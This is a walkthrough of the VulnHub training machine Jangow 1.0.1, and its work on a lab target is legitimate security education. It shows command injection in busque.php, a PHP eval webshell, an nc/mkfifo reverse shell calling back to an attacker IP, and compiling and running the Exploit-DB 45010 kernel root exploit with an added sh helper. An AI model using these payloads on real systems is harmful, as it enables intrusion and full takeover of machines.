
[VulnHub lab] Jangow: 1.0.1

2022-06-10 19:00:00 Nailaoyyds

Contents

1. Information gathering
   nmap scanning
2. Web penetration
   Finding the function point
   Writing a one-line webshell
3. Exploitation
   Searching for sensitive files
4. Privilege escalation
   Reverse shell
   Escalating privileges
   Uploading with AntSword
5. Getting the flag



1. Information gathering

Jangow 1.0.1 target IP: 192.168.56.118
Kali attacker IP:       192.168.56.102

Start by scanning the target IP.

nmap scanning

Scan the target to get its open ports and services.

2. Web penetration

Finding the function point

Browsing into the site directory reveals a function point that takes user input:
http://192.168.56.118/site/busque.php?buscar=
Try command execution with whoami:
http://192.168.56.118/site/busque.php?buscar=whoami
The output shows the command executes: the buscar parameter is passed straight to a shell. Read the password file with:
cat /etc/passwd

 

This only lets us read files as the web server user; it is not a login. The next step is a webshell.

Writing a one-line webshell

Write a one-line PHP webshell through the same injection point:
echo '<?php @eval($_POST["123"]);?>' >>shell.php
PHP changes into the script's own directory before running it, so the file lands next to busque.php and is reachable at http://192.168.56.118/site/shell.php. Because the payload travels in the buscar= parameter, the quotes, <, ?, > and $ must survive URL encoding; a browser handles most of it, but confirm the file exists (requesting shell.php should return an empty 200, not a 404) before moving on.

Connect with AntSword using that URL and the password 123.

3. Exploitation

Searching for sensitive files

Use the AntSword file manager to look through the site for sensitive files.

4. Privilege escalation

Some files cannot be read with the web server user's permissions, so escalate privileges.

Reverse shell

Drop a PHP file that calls back to a netcat listener on port 443:
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.128 443 >/tmp/f');?>

The address in the payload must be the attacker's listening IP (the Kali box is 192.168.56.102 in the setup above, so adjust it to your own), and the listener must be running before the file is requested. Requesting the file makes the target connect back, and the reverse shell arrives.

Upgrade to an interactive shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'

uname -a
This gives the kernel version.

Escalating privileges

Search by kernel version:
searchsploit ubuntu 4.4.0

Use 45010.c for the escalation (Exploit-DB 45010, the eBPF verifier bug CVE-2017-16995, listed for Linux kernels before 4.13.9 on Ubuntu 16.04).

Uploading with AntSword

Upload the exploit source to the target with AntSword. Download link:
https://gitee.com/jewels/Privilege-Escalation/repository/archive/master.zip

 


gcc 45010.c -o exp    # compile the exploit
chmod +x exp          # make sure it is executable
./exp                 # run the exploit
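Before compiling and running 45010.c, a practitioner checks that the exploit actually targets the kernel in hand, and afterwards checks that the new shell really is uid 0. The helpers below do those two checks in POSIX sh and wrap the gcc step with error handling; they are an added example, not part of the original write-up. The 4.13.9 threshold is the mainline version in the Exploit-DB title for 45010 and is only a coarse filter, because Ubuntu backports fixes into its 4.4.0 kernels without changing the upstream number; the uname -a line in the usage comment is constructed, not captured from the box.

```shell
#!/bin/sh
# Added example (not from the original write-up): sanity checks around the
# 45010.c step. The 4.13.9 threshold is taken from the Exploit-DB title for
# 45010 and is an assumption as far as Ubuntu backports go, see the text above.
EXPLOIT_FIXED_IN="4.13.9"

# The kernel release is the third field of `uname -a`, e.g. 4.4.0-31-generic.
kernel_release() {
    set -- $1
    printf '%s' "$3"
}

# Return 0 when dotted version $1 is older than $2. Distro suffixes such as
# "-31-generic" are stripped first, so this is a coarse mainline filter.
kver_lt() {
    a=${1%%-*}; b=${2%%-*}
    while [ -n "$a" ] || [ -n "$b" ]; do
        x=${a%%.*}; y=${b%%.*}
        [ "${x:-0}" -lt "${y:-0}" ] && return 0
        [ "${x:-0}" -gt "${y:-0}" ] && return 1
        case $a in *.*) a=${a#*.} ;; *) a= ;; esac
        case $b in *.*) b=${b#*.} ;; *) b= ;; esac
    done
    return 1
}

# Is the kernel in a `uname -a` line a candidate for 45010.c? Always confirm
# by reading the exploit header and the target kernel's changelog as well.
candidate_for_45010() {
    kver_lt "$(kernel_release "$1")" "$EXPLOIT_FIXED_IN"
}

# Compile on the target itself so libc and headers match the running system.
# Returns 2 when there is no compiler, 1 when compilation fails.
build_exploit() {
    src=$1; out=${2:-exp}
    command -v "${CC:-gcc}" >/dev/null 2>&1 || {
        echo "no compiler on target; build elsewhere against the same libc" >&2
        return 2
    }
    "${CC:-gcc}" "$src" -o "$out" 2>"$out.build.log" || {
        echo "build failed, see $out.build.log" >&2
        return 1
    }
    chmod +x "$out"
}

# Check the output of `id` from the new shell: uid=0(...) means root.
is_root() {
    case $1 in uid=0\(*) return 0 ;; *) return 1 ;; esac
}

# Typical run on the target (constructed uname line, not captured from the box):
#   uname_line="Linux target 4.4.0-31-generic #50-Ubuntu SMP x86_64 GNU/Linux"
#   candidate_for_45010 "$uname_line" && build_exploit 45010.c exp && ./exp
#   is_root "$(id)" && echo "root shell confirmed"
```

Compiling on the target avoids the libc mismatch you get when a binary built on a newer Kali is copied over; when the target has no gcc, build in a VM that matches its distribution release instead.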

 

With root, enter the root user's directory and look for the flag file.

5. Getting the flag

Original post: https://yzsam.com/2022/161/202206101812248918.html

Copyright notice: this article was written by Nailaoyyds; please include the original link when reposting. Thank you.